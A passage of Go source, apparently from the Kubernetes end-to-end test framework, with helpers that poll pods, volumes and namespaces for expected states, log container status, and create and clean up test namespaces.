if len(pod.Spec.NodeName) > maxNodeW {
maxNodeW = len(pod.Spec.NodeName)
}
if len(pod.Status.Phase) > maxPhaseW {
maxPhaseW = len(pod.Status.Phase)
}
}
// Increase widths by one to separate by a single space.
maxPodW++
maxNodeW++
maxPhaseW++
maxGraceW++
// Log pod info. * does space padding, - makes them left-aligned.
Logf("%-[1]*[2]s %-[3]*[4]s %-[5]*[6]s %-[7]*[8]s %[9]s",
maxPodW, "POD", maxNodeW, "NODE", maxPhaseW, "PHASE", maxGraceW, "GRACE", "CONDITIONS")
for _, pod := range pods {
grace := ""
if pod.DeletionGracePeriodSeconds != nil {
grace = fmt.Sprintf("%ds", *pod.DeletionGracePeriodSeconds)
}
Logf("%-[1]*[2]s %-[3]*[4]s %-[5]*[6]s %-[7]*[8]s %[9]s",
maxPodW, pod.ObjectMeta.Name, maxNodeW, pod.Spec.NodeName, maxPhaseW, pod.Status.Phase, maxGraceW, grace, pod.Status.Conditions)
}
Logf("") // Final empty line helps for readability.
}
// errorBadPodsStates create error message of basic info of bad pods for debugging.
func errorBadPodsStates(badPods []v1.Pod, desiredPods int, ns, desiredState string, timeout time.Duration) string {
errStr := fmt.Sprintf("%d / %d pods in namespace %q are NOT in %s state in %v\n", len(badPods), desiredPods, ns, desiredState, timeout)
// Pirnt bad pods info only if there are fewer than 10 bad pods
if len(badPods) > 10 {
return errStr + "There are too many bad pods. Please check log for details."
}
buf := bytes.NewBuffer(nil)
w := tabwriter.NewWriter(buf, 0, 0, 1, ' ', 0)
fmt.Fprintln(w, "POD\tNODE\tPHASE\tGRACE\tCONDITIONS")
for _, badPod := range badPods {
grace := ""
if badPod.DeletionGracePeriodSeconds != nil {
grace = fmt.Sprintf("%ds", *badPod.DeletionGracePeriodSeconds)
}
podInfo := fmt.Sprintf("%s\t%s\t%s\t%s\t%s",
badPod.ObjectMeta.Name, badPod.Spec.NodeName, badPod.Status.Phase, grace, badPod.Status.Conditions)
fmt.Fprintln(w, podInfo)
}
w.Flush()
return errStr + buf.String()
}
// WaitForPodsSuccess waits till all labels matching the given selector enter
// the Success state. The caller is expected to only invoke this method once the
// pods have been created.
func WaitForPodsSuccess(c clientset.Interface, ns string, successPodLabels map[string]string, timeout time.Duration) error {
successPodSelector := labels.SelectorFromSet(successPodLabels)
start, badPods, desiredPods := time.Now(), []v1.Pod{}, 0
if wait.PollImmediate(30*time.Second, timeout, func() (bool, error) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: successPodSelector.String()})
if err != nil {
Logf("Error getting pods in namespace %q: %v", ns, err)
return false, nil
}
if len(podList.Items) == 0 {
Logf("Waiting for pods to enter Success, but no pods in %q match label %v", ns, successPodLabels)
return true, nil
}
badPods = []v1.Pod{}
desiredPods = len(podList.Items)
for _, pod := range podList.Items {
if pod.Status.Phase != v1.PodSucceeded {
badPods = append(badPods, pod)
}
}
successPods := len(podList.Items) - len(badPods)
Logf("%d / %d pods in namespace %q are in Success state (%d seconds elapsed)",
successPods, len(podList.Items), ns, int(time.Since(start).Seconds()))
if len(badPods) == 0 {
return true, nil
}
return false, nil
}) != nil {
logPodStates(badPods)
LogPodsWithLabels(c, ns, successPodLabels, Logf)
return errors.New(errorBadPodsStates(badPods, desiredPods, ns, "SUCCESS", timeout))
}
return nil
}
// WaitForPodsRunningReady waits up to timeout to ensure that all pods in
// namespace ns are either running and ready, or failed but controlled by a
// controller. Also, it ensures that at least minPods are running and
// ready. It has separate behavior from other 'wait for' pods functions in
// that it requests the list of pods on every iteration. This is useful, for
// example, in cluster startup, because the number of pods increases while
// waiting. All pods that are in SUCCESS state are not counted.
//
// If ignoreLabels is not empty, pods matching this selector are ignored.
func WaitForPodsRunningReady(c clientset.Interface, ns string, minPods, allowedNotReadyPods int32, timeout time.Duration, ignoreLabels map[string]string) error {
ignoreSelector := labels.SelectorFromSet(ignoreLabels)
start := time.Now()
Logf("Waiting up to %v for all pods (need at least %d) in namespace '%s' to be running and ready",
timeout, minPods, ns)
wg := sync.WaitGroup{}
wg.Add(1)
var ignoreNotReady bool
badPods := []v1.Pod{}
desiredPods := 0
if wait.PollImmediate(Poll, timeout, func() (bool, error) {
// We get the new list of pods, replication controllers, and
// replica sets in every iteration because more pods come
// online during startup and we want to ensure they are also
// checked.
replicas, replicaOk := int32(0), int32(0)
rcList, err := c.Core().ReplicationControllers(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting replication controllers in namespace '%s': %v", ns, err)
return false, nil
}
for _, rc := range rcList.Items {
replicas += *rc.Spec.Replicas
replicaOk += rc.Status.ReadyReplicas
}
rsList, err := c.Extensions().ReplicaSets(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting replication sets in namespace %q: %v", ns, err)
return false, nil
}
for _, rs := range rsList.Items {
replicas += *rs.Spec.Replicas
replicaOk += rs.Status.ReadyReplicas
}
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting pods in namespace '%s': %v", ns, err)
return false, nil
}
nOk := int32(0)
notReady := int32(0)
badPods = []v1.Pod{}
desiredPods = len(podList.Items)
for _, pod := range podList.Items {
if len(ignoreLabels) != 0 && ignoreSelector.Matches(labels.Set(pod.Labels)) {
continue
}
res, err := testutils.PodRunningReady(&pod)
switch {
case res && err == nil:
nOk++
case pod.Status.Phase == v1.PodSucceeded:
continue
case pod.Status.Phase == v1.PodSucceeded:
Logf("The status of Pod %s is Succeeded which is unexpected", pod.ObjectMeta.Name)
badPods = append(badPods, pod)
// it doesn't make sense to wait for this pod
return false, errors.New("unexpected Succeeded pod state")
case pod.Status.Phase != v1.PodFailed:
Logf("The status of Pod %s is %s (Ready = false), waiting for it to be either Running (with Ready = true) or Failed", pod.ObjectMeta.Name, pod.Status.Phase)
notReady++
badPods = append(badPods, pod)
default:
if _, ok := pod.Annotations[v1.CreatedByAnnotation]; !ok {
Logf("Pod %s is Failed, but it's not controlled by a controller", pod.ObjectMeta.Name)
badPods = append(badPods, pod)
}
//ignore failed pods that are controlled by some controller
}
}
Logf("%d / %d pods in namespace '%s' are running and ready (%d seconds elapsed)",
nOk, len(podList.Items), ns, int(time.Since(start).Seconds()))
Logf("expected %d pod replicas in namespace '%s', %d are Running and Ready.", replicas, ns, replicaOk)
if replicaOk == replicas && nOk >= minPods && len(badPods) == 0 {
return true, nil
}
ignoreNotReady = (notReady <= allowedNotReadyPods)
logPodStates(badPods)
return false, nil
}) != nil {
if !ignoreNotReady {
return errors.New(errorBadPodsStates(badPods, desiredPods, ns, "RUNNING and READY", timeout))
}
Logf("Number of not-ready pods is allowed.")
}
return nil
}
func kubectlLogPod(c clientset.Interface, pod v1.Pod, containerNameSubstr string, logFunc func(ftm string, args ...interface{})) {
for _, container := range pod.Spec.Containers {
if strings.Contains(container.Name, containerNameSubstr) {
// Contains() matches all strings if substr is empty
logs, err := GetPodLogs(c, pod.Namespace, pod.Name, container.Name)
if err != nil {
logs, err = getPreviousPodLogs(c, pod.Namespace, pod.Name, container.Name)
if err != nil {
logFunc("Failed to get logs of pod %v, container %v, err: %v", pod.Name, container.Name, err)
}
}
logFunc("Logs of %v/%v:%v on node %v", pod.Namespace, pod.Name, container.Name, pod.Spec.NodeName)
logFunc("%s : STARTLOG\n%s\nENDLOG for container %v:%v:%v", containerNameSubstr, logs, pod.Namespace, pod.Name, container.Name)
}
}
}
func LogFailedContainers(c clientset.Interface, ns string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
logFunc("Error getting pods in namespace '%s': %v", ns, err)
return
}
logFunc("Running kubectl logs on non-ready containers in %v", ns)
for _, pod := range podList.Items {
if res, err := testutils.PodRunningReady(&pod); !res || err != nil {
kubectlLogPod(c, pod, "", Logf)
}
}
}
func LogPodsWithLabels(c clientset.Interface, ns string, match map[string]string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: labels.SelectorFromSet(match).String()})
if err != nil {
logFunc("Error getting pods in namespace %q: %v", ns, err)
return
}
logFunc("Running kubectl logs on pods with labels %v in %v", match, ns)
for _, pod := range podList.Items {
kubectlLogPod(c, pod, "", logFunc)
}
}
func LogContainersInPodsWithLabels(c clientset.Interface, ns string, match map[string]string, containerSubstr string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: labels.SelectorFromSet(match).String()})
if err != nil {
Logf("Error getting pods in namespace %q: %v", ns, err)
return
}
for _, pod := range podList.Items {
kubectlLogPod(c, pod, containerSubstr, logFunc)
}
}
// DeleteNamespaces deletes all namespaces that match the given delete and skip filters.
// Filter is by simple strings.Contains; first skip filter, then delete filter.
// Returns the list of deleted namespaces or an error.
func DeleteNamespaces(c clientset.Interface, deleteFilter, skipFilter []string) ([]string, error) {
By("Deleting namespaces")
nsList, err := c.Core().Namespaces().List(metav1.ListOptions{})
Expect(err).NotTo(HaveOccurred())
var deleted []string
var wg sync.WaitGroup
OUTER:
for _, item := range nsList.Items {
if skipFilter != nil {
for _, pattern := range skipFilter {
if strings.Contains(item.Name, pattern) {
continue OUTER
}
}
}
if deleteFilter != nil {
var shouldDelete bool
for _, pattern := range deleteFilter {
if strings.Contains(item.Name, pattern) {
shouldDelete = true
break
}
}
if !shouldDelete {
continue OUTER
}
}
wg.Add(1)
deleted = append(deleted, item.Name)
go func(nsName string) {
defer wg.Done()
defer GinkgoRecover()
Expect(c.Core().Namespaces().Delete(nsName, nil)).To(Succeed())
Logf("namespace : %v api call to delete is complete ", nsName)
}(item.Name)
}
wg.Wait()
return deleted, nil
}
func WaitForNamespacesDeleted(c clientset.Interface, namespaces []string, timeout time.Duration) error {
By("Waiting for namespaces to vanish")
nsMap := map[string]bool{}
for _, ns := range namespaces {
nsMap[ns] = true
}
//Now POLL until all namespaces have been eradicated.
return wait.Poll(2*time.Second, timeout,
func() (bool, error) {
nsList, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
return false, err
}
for _, item := range nsList.Items {
if _, ok := nsMap[item.Name]; ok {
return false, nil
}
}
return true, nil
})
}
func waitForServiceAccountInNamespace(c clientset.Interface, ns, serviceAccountName string, timeout time.Duration) error {
w, err := c.Core().ServiceAccounts(ns).Watch(metav1.SingleObject(metav1.ObjectMeta{Name: serviceAccountName}))
if err != nil {
return err
}
_, err = watch.Until(timeout, w, conditions.ServiceAccountHasSecrets)
return err
}
func WaitForPodCondition(c clientset.Interface, ns, podName, desc string, timeout time.Duration, condition podCondition) error {
Logf("Waiting up to %[1]v for pod %[2]s status to be %[3]s", timeout, podName, desc)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pod, err := c.Core().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("Pod %q in namespace %q disappeared. Error: %v", podName, ns, err)
return err
}
// Aligning this text makes it much more readable
Logf("Get pod %[1]s in namespace '%[2]s' failed, ignoring for %[3]v. Error: %[4]v",
podName, ns, Poll, err)
continue
}
done, err := condition(pod)
if done {
return err
}
Logf("Waiting for pod %[1]s in namespace '%[2]s' status to be '%[3]s'"+
"(found phase: %[4]q, readiness: %[5]t) (%[6]v elapsed)",
podName, ns, desc, pod.Status.Phase, testutils.PodReady(pod), time.Since(start))
}
return fmt.Errorf("gave up waiting for pod '%s' to be '%s' after %v", podName, desc, timeout)
}
// WaitForMatchPodsCondition finds match pods based on the input ListOptions.
// waits and checks if all match pods are in the given podCondition
func WaitForMatchPodsCondition(c clientset.Interface, opts metav1.ListOptions, desc string, timeout time.Duration, condition podCondition) error {
Logf("Waiting up to %v for matching pods' status to be %s", timeout, desc)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pods, err := c.Core().Pods(metav1.NamespaceAll).List(opts)
if err != nil {
return err
}
conditionNotMatch := []string{}
for _, pod := range pods.Items {
done, err := condition(&pod)
if done && err != nil {
return fmt.Errorf("Unexpected error: %v", err)
}
if !done {
conditionNotMatch = append(conditionNotMatch, format.Pod(&pod))
}
}
if len(conditionNotMatch) <= 0 {
return err
}
Logf("%d pods are not %s: %v", len(conditionNotMatch), desc, conditionNotMatch)
}
return fmt.Errorf("gave up waiting for matching pods to be '%s' after %v", desc, timeout)
}
// WaitForDefaultServiceAccountInNamespace waits for the default service account to be provisioned
// the default service account is what is associated with pods when they do not specify a service account
// as a result, pods are not able to be provisioned in a namespace until the service account is provisioned
func WaitForDefaultServiceAccountInNamespace(c clientset.Interface, namespace string) error {
return waitForServiceAccountInNamespace(c, namespace, "default", ServiceAccountProvisionTimeout)
}
// WaitForPersistentVolumePhase waits for a PersistentVolume to be in a specific phase or until timeout occurs, whichever comes first.
func WaitForPersistentVolumePhase(phase v1.PersistentVolumePhase, c clientset.Interface, pvName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolume %s to have phase %s", timeout, pvName, phase)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pv, err := c.Core().PersistentVolumes().Get(pvName, metav1.GetOptions{})
if err != nil {
Logf("Get persistent volume %s in failed, ignoring for %v: %v", pvName, Poll, err)
continue
} else {
if pv.Status.Phase == phase {
Logf("PersistentVolume %s found and phase=%s (%v)", pvName, phase, time.Since(start))
return nil
} else {
Logf("PersistentVolume %s found but phase is %s instead of %s.", pvName, pv.Status.Phase, phase)
}
}
}
return fmt.Errorf("PersistentVolume %s not in phase %s within %v", pvName, phase, timeout)
}
// WaitForPersistentVolumeDeleted waits for a PersistentVolume to get deleted or until timeout occurs, whichever comes first.
func WaitForPersistentVolumeDeleted(c clientset.Interface, pvName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolume %s to get deleted", timeout, pvName)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pv, err := c.Core().PersistentVolumes().Get(pvName, metav1.GetOptions{})
if err == nil {
Logf("PersistentVolume %s found and phase=%s (%v)", pvName, pv.Status.Phase, time.Since(start))
continue
} else {
if apierrs.IsNotFound(err) {
Logf("PersistentVolume %s was removed", pvName)
return nil
} else {
Logf("Get persistent volume %s in failed, ignoring for %v: %v", pvName, Poll, err)
}
}
}
return fmt.Errorf("PersistentVolume %s still exists within %v", pvName, timeout)
}
// WaitForPersistentVolumeClaimPhase waits for a PersistentVolumeClaim to be in a specific phase or until timeout occurs, whichever comes first.
func WaitForPersistentVolumeClaimPhase(phase v1.PersistentVolumeClaimPhase, c clientset.Interface, ns string, pvcName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolumeClaim %s to have phase %s", timeout, pvcName, phase)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pvc, err := c.Core().PersistentVolumeClaims(ns).Get(pvcName, metav1.GetOptions{})
if err != nil {
Logf("Failed to get claim %q, retrying in %v. Error: %v", pvcName, Poll, err)
continue
} else {
if pvc.Status.Phase == phase {
Logf("PersistentVolumeClaim %s found and phase=%s (%v)", pvcName, phase, time.Since(start))
return nil
} else {
Logf("PersistentVolumeClaim %s found but phase is %s instead of %s.", pvcName, pvc.Status.Phase, phase)
}
}
}
return fmt.Errorf("PersistentVolumeClaim %s not in phase %s within %v", pvcName, phase, timeout)
}
// CreateTestingNS should be used by every test, note that we append a common prefix to the provided test name.
// Please see NewFramework instead of using this directly.
func CreateTestingNS(baseName string, c clientset.Interface, labels map[string]string) (*v1.Namespace, error) {
if labels == nil {
labels = map[string]string{}
}
labels["e2e-run"] = string(RunId)
namespaceObj := &v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
GenerateName: fmt.Sprintf("e2e-tests-%v-", baseName),
Namespace: "",
Labels: labels,
},
Status: v1.NamespaceStatus{},
}
// Be robust about making the namespace creation call.
var got *v1.Namespace
if err := wait.PollImmediate(Poll, 30*time.Second, func() (bool, error) {
var err error
got, err = c.Core().Namespaces().Create(namespaceObj)
if err != nil {
Logf("Unexpected error while creating namespace: %v", err)
return false, nil
}
return true, nil
}); err != nil {
return nil, err
}
if TestContext.VerifyServiceAccount {
if err := WaitForDefaultServiceAccountInNamespace(c, got.Name); err != nil {
// Even if we fail to create serviceAccount in the namespace,
// we have successfully create a namespace.
// So, return the created namespace.
return got, err
}
}
return got, nil
}
// CheckTestingNSDeletedExcept checks whether all e2e based existing namespaces are in the Terminating state
// and waits until they are finally deleted. It ignores namespace skip.
func CheckTestingNSDeletedExcept(c clientset.Interface, skip string) error {
// TODO: Since we don't have support for bulk resource deletion in the API,
// while deleting a namespace we are deleting all objects from that namespace
// one by one (one deletion == one API call). This basically exposes us to
// throttling - currently controller-manager has a limit of max 20 QPS.
// Once #10217 is implemented and used in namespace-controller, deleting all
// object from a given namespace should be much faster and we will be able
// to lower this timeout.
// However, now Density test is producing ~26000 events and Load capacity test
// is producing ~35000 events, thus assuming there are no other requests it will
// take ~30 minutes to fully delete the namespace. Thus I'm setting it to 60
// minutes to avoid any timeouts here.
timeout := 60 * time.Minute
Logf("Waiting for terminating namespaces to be deleted...")
for start := time.Now(); time.Since(start) < timeout; time.Sleep(15 * time.Second) {
namespaces, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
Logf("Listing namespaces failed: %v", err)
continue
}
terminating := 0
for _, ns := range namespaces.Items {
if strings.HasPrefix(ns.ObjectMeta.Name, "e2e-tests-") && ns.ObjectMeta.Name != skip {
if ns.Status.Phase == v1.NamespaceActive {
return fmt.Errorf("Namespace %s is active", ns.ObjectMeta.Name)
}
terminating++
}
}
if terminating == 0 {
return nil
}
}
return fmt.Errorf("Waiting for terminating namespaces to be deleted timed out")
}
// deleteNS deletes the provided namespace, waits for it to be completely deleted, and then checks
// whether there are any pods remaining in a non-terminating state.
func deleteNS(c clientset.Interface, clientPool dynamic.ClientPool, namespace string, timeout time.Duration) error {
startTime := time.Now()
if err := c.Core().Namespaces().Delete(namespace, nil); err != nil {
return err
}
// wait for namespace to delete or timeout.
err := wait.PollImmediate(2*time.Second, timeout, func() (bool, error) {
if _, err := c.Core().Namespaces().Get(namespace, metav1.GetOptions{}); err != nil {
if apierrs.IsNotFound(err) {
return true, nil
}
Logf("Error while waiting for namespace to be terminated: %v", err)
return false, nil
}
return false, nil
})
// verify there is no more remaining content in the namespace
remainingContent, cerr := hasRemainingContent(c, clientPool, namespace)
if cerr != nil {
return cerr
}
// if content remains, let's dump information about the namespace, and system for flake debugging.
remainingPods := 0
missingTimestamp := 0
if remainingContent {
// log information about namespace, and set of namespaces in api server to help flake detection
logNamespace(c, namespace)
logNamespaces(c, namespace)
// if we can, check if there were pods remaining with no timestamp.
remainingPods, missingTimestamp, _ = countRemainingPods(c, namespace)
}
// a timeout waiting for namespace deletion happened!
if err != nil {
// some content remains in the namespace
if remainingContent {
// pods remain
if remainingPods > 0 {
// but they were all undergoing deletion (kubelet is probably culprit)
if missingTimestamp == 0 {
return fmt.Errorf("namespace %v was not deleted with limit: %v, pods remaining: %v, pods missing deletion timestamp: %v", namespace, err, remainingPods, missingTimestamp)
}
// pods remained, but were not undergoing deletion (namespace controller is probably culprit)
return fmt.Errorf("namespace %v was not deleted with limit: %v, pods remaining: %v", namespace, err, remainingPods)
}
// other content remains (namespace controller is probably screwed up)
return fmt.Errorf("namespace %v was not deleted with limit: %v, namespaced content other than pods remain", namespace, err)
}
// no remaining content, but namespace was not deleted (namespace controller is probably wedged)
return fmt.Errorf("namespace %v was not deleted with limit: %v, namespace is empty but is not yet removed", namespace, err)
}
Logf("namespace %v deletion completed in %s", namespace, time.Now().Sub(startTime))
return nil
}
// logNamespaces logs the number of namespaces by phase
// namespace is the namespace the test was operating against that failed to delete so it can be grepped in logs
func logNamespaces(c clientset.Interface, namespace string) {
namespaceList, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
Logf("namespace: %v, unable to list namespaces: %v", namespace, err)
return
}
numActive := 0
numTerminating := 0
for _, namespace := range namespaceList.Items {
if namespace.Status.Phase == v1.NamespaceActive {
numActive++
} else {
numTerminating++
}
}
Logf("namespace: %v, total namespaces: %v, active: %v, terminating: %v", namespace, len(namespaceList.Items), numActive, numTerminating)
}
// logNamespace logs detail about a namespace
func logNamespace(c clientset.Interface, namespace string) {
ns, err := c.Core().Namespaces().Get(namespace, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("namespace: %v no longer exists", namespace)
return
}
Logf("namespace: %v, unable to get namespace due to error: %v", namespace, err)
return
}
Logf("namespace: %v, DeletionTimetamp: %v, Finalizers: %v, Phase: %v", ns.Name, ns.DeletionTimestamp, ns.Spec.Finalizers, ns.Status.Phase)
}
// countRemainingPods queries the server to count number of remaining pods, and number of pods that had a missing deletion timestamp.
func countRemainingPods(c clientset.Interface, namespace string) (int, int, error) {
// check for remaining pods
pods, err := c.Core().Pods(namespace).List(metav1.ListOptions{})
if err != nil {
return 0, 0, err
}
// nothing remains!
if len(pods.Items) == 0 {
return 0, 0, nil
}
// stuff remains, log about it
logPodStates(pods.Items)
// check if there were any pods with missing deletion timestamp
numPods := len(pods.Items)
missingTimestamp := 0
for _, pod := range pods.Items {
if pod.DeletionTimestamp == nil {
missingTimestamp++
}
}
return numPods, missingTimestamp, nil
}
// hasRemainingContent checks if there is remaining content in the namespace via API discovery
func hasRemainingContent(c clientset.Interface, clientPool dynamic.ClientPool, namespace string) (bool, error) {
// some tests generate their own framework.Client rather than the default
// TODO: ensure every test call has a configured clientPool
if clientPool == nil {
return false, nil
}
// find out what content is supported on the server
resources, err := c.Discovery().ServerPreferredNamespacedResources()
if err != nil {
return false, err
}
groupVersionResources, err := discovery.GroupVersionResources(resources)
if err != nil {
return false, err
}
// TODO: temporary hack for https://github.com/kubernetes/kubernetes/issues/31798
ignoredResources := sets.NewString("bindings")
contentRemaining := false
// dump how many of resource type is on the server in a log.
for gvr := range groupVersionResources {
// get a client for this group version...
dynamicClient, err := clientPool.ClientForGroupVersionResource(gvr)
if err != nil {
// not all resource types support list, so some errors here are normal depending on the resource type.
Logf("namespace: %s, unable to get client - gvr: %v, error: %v", namespace, gvr, err)
continue
}
// get the api resource
apiResource := metav1.APIResource{Name: gvr.Resource, Namespaced: true}
// TODO: temporary hack for https://github.com/kubernetes/kubernetes/issues/31798
if ignoredResources.Has(apiResource.Name) {
Logf("namespace: %s, resource: %s, ignored listing per whitelist", namespace, apiResource.Name)
continue
}
obj, err := dynamicClient.Resource(&apiResource, namespace).List(metav1.ListOptions{})
if err != nil {
// not all resources support list, so we ignore those
if apierrs.IsMethodNotSupported(err) || apierrs.IsNotFound(err) || apierrs.IsForbidden(err) {
continue
}
return false, err
}
unstructuredList, ok := obj.(*unstructured.UnstructuredList)
if !ok {
return false, fmt.Errorf("namespace: %s, resource: %s, expected *unstructured.UnstructuredList, got %#v", namespace, apiResource.Name, obj)
}
if len(unstructuredList.Items) > 0 {
Logf("namespace: %s, resource: %s, items remaining: %v", namespace, apiResource.Name, len(unstructuredList.Items))
contentRemaining = true
}
}
return contentRemaining, nil
}
func ContainerInitInvariant(older, newer runtime.Object) error {
oldPod := older.(*v1.Pod)
newPod := newer.(*v1.Pod)
if len(oldPod.Spec.InitContainers) == 0 {
return nil
}
if len(oldPod.Spec.InitContainers) != len(newPod.Spec.InitContainers) {
return fmt.Errorf("init container list changed")
}
if oldPod.UID != newPod.UID {
return fmt.Errorf("two different pods exist in the condition: %s vs %s", oldPod.UID, newPod.UID)
}
if err := initContainersInvariants(oldPod); err != nil {
return err
}
if err := initContainersInvariants(newPod); err != nil {
return err
}
oldInit, _, _ := podInitialized(oldPod)
newInit, _, _ := podInitialized(newPod)
if oldInit && !newInit {
// TODO: we may in the future enable resetting PodInitialized = false if the kubelet needs to restart it
// from scratch
return fmt.Errorf("pod cannot be initialized and then regress to not being initialized")
}
return nil
}
func podInitialized(pod *v1.Pod) (ok bool, failed bool, err error) {
allInit := true
initFailed := false
for _, s := range pod.Status.InitContainerStatuses {
switch {
case initFailed && s.State.Waiting == nil:
return allInit, initFailed, fmt.Errorf("container %s is after a failed container but isn't waiting", s.Name)
case allInit && s.State.Waiting == nil:
return allInit, initFailed, fmt.Errorf("container %s is after an initializing container but isn't waiting", s.Name)
case s.State.Terminated == nil:
allInit = false
case s.State.Terminated.ExitCode != 0:
allInit = false
initFailed = true
case !s.Ready:
return allInit, initFailed, fmt.Errorf("container %s initialized but isn't marked as ready", s.Name)
}
}
return allInit, initFailed, nil
}
func initContainersInvariants(pod *v1.Pod) error {
allInit, initFailed, err := podInitialized(pod)
if err != nil {
return err
}
if !allInit || initFailed {
for _, s := range pod.Status.ContainerStatuses {
if s.State.Waiting == nil || s.RestartCount != 0 {
return fmt.Errorf("container %s is not waiting but initialization not complete", s.Name)
}
if s.State.Waiting.Reason != "PodInitializing" {
return fmt.Errorf("container %s should have reason PodInitializing: %s", s.Name, s.State.Waiting.Reason)
}
}
}
_, c := podutil.GetPodCondition(&pod.Status, v1.PodInitialized)
if c == nil {
return fmt.Errorf("pod does not have initialized condition")
}
if c.LastTransitionTime.IsZero() {
return fmt.Errorf("PodInitialized condition should always have a transition time")
}
switch {
case c.Status == v1.ConditionUnknown:
return fmt.Errorf("PodInitialized condition should never be Unknown")
case c.Status == v1.ConditionTrue && (initFailed || !allInit):
return fmt.Errorf("PodInitialized condition was True but all not all containers initialized")
case c.Status == v1.ConditionFalse && (!initFailed && allInit):
return fmt.Errorf("PodInitialized condition was False but all containers initialized")
}
return nil
}
type InvariantFunc func(older, newer runtime.Object) error
func CheckInvariants(events []watch.Event, fns ...InvariantFunc) error {
errs := sets.NewString()
for i := range events {
j := i + 1
if j >= len(events) {
continue
}
for _, fn := range fns {
if err := fn(events[i].Object, events[j].Object); err != nil {
errs.Insert(err.Error())
}
}
}
if errs.Len() > 0 {
return fmt.Errorf("invariants violated:\n* %s", strings.Join(errs.List(), "\n* "))
}
return nil
}
// Waits default amount of time (PodStartTimeout) for the specified pod to become running.
// Returns an error if timeout occurs first, or pod goes in to failed state.
func WaitForPodRunningInNamespace(c clientset.Interface, pod *v1.Pod) error {
if pod.Status.Phase == v1.PodRunning {
return nil
}
return waitTimeoutForPodRunningInNamespace(c, pod.Name, pod.Namespace, PodStartTimeout)
}
// Waits default amount of time (PodStartTimeout) for the specified pod to become running.
// Returns an error if timeout occurs first, or pod goes in to failed state.
func WaitForPodNameRunningInNamespace(c clientset.Interface, podName, namespace string) error {
return waitTimeoutForPodRunningInNamespace(c, podName, namespace, PodStartTimeout)
}
// Waits an extended amount of time (slowPodStartTimeout) for the specified pod to become running.
// The resourceVersion is used when Watching object changes, it tells since when we care
// about changes to the pod. Returns an error if timeout occurs first, or pod goes in to failed state.
func waitForPodRunningInNamespaceSlow(c clientset.Interface, podName, namespace string) error {
return waitTimeoutForPodRunningInNamespace(c, podName, namespace, slowPodStartTimeout)
}
func waitTimeoutForPodRunningInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podRunning(c, podName, namespace))
}
func podRunning(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodRunning:
return true, nil
case v1.PodFailed, v1.PodSucceeded:
return false, conditions.ErrPodCompleted
}
return false, nil
}
}
// Waits default amount of time (DefaultPodDeletionTimeout) for the specified pod to stop running.
// Returns an error if timeout occurs first.
func WaitForPodNoLongerRunningInNamespace(c clientset.Interface, podName, namespace string) error {
return WaitTimeoutForPodNoLongerRunningInNamespace(c, podName, namespace, DefaultPodDeletionTimeout)
}
func WaitTimeoutForPodNoLongerRunningInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podCompleted(c, podName, namespace))
}
func podCompleted(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodFailed, v1.PodSucceeded:
return true, nil
}
return false, nil
}
}
func waitTimeoutForPodReadyInNamespace(c clientset.Interface, podName, namespace string, timeout time.Duration) error {
return wait.PollImmediate(Poll, timeout, podRunningAndReady(c, podName, namespace))
}
func podRunningAndReady(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodFailed, v1.PodSucceeded:
return false, conditions.ErrPodCompleted
case v1.PodRunning:
return podutil.IsPodReady(pod), nil
}
return false, nil
}
}
// WaitForPodNotPending returns an error if it took too long for the pod to go out of pending state.
// The resourceVersion is used when Watching object changes, it tells since when we care
// about changes to the pod.
func WaitForPodNotPending(c clientset.Interface, ns, podName string) error {
return wait.PollImmediate(Poll, PodStartTimeout, podNotPending(c, podName, ns))
}
func podNotPending(c clientset.Interface, podName, namespace string) wait.ConditionFunc {
return func() (bool, error) {
pod, err := c.Core().Pods(namespace).Get(podName, metav1.GetOptions{})
if err != nil {
return false, err
}
switch pod.Status.Phase {
case v1.PodPending:
return false, nil
default:
return true, nil
}
}
}
// waitForPodTerminatedInNamespace returns an error if it took too long for the pod
// to terminate or if the pod terminated with an unexpected reason.
func waitForPodTerminatedInNamespace(c clientset.Interface, podName, reason, namespace string) error {
return WaitForPodCondition(c, namespace, podName, "terminated due to deadline exceeded", PodStartTimeout, func(pod *v1.Pod) (bool, error) {
if pod.Status.Phase == v1.PodFailed {
if pod.Status.Reason == reason {
return true, nil
} else {
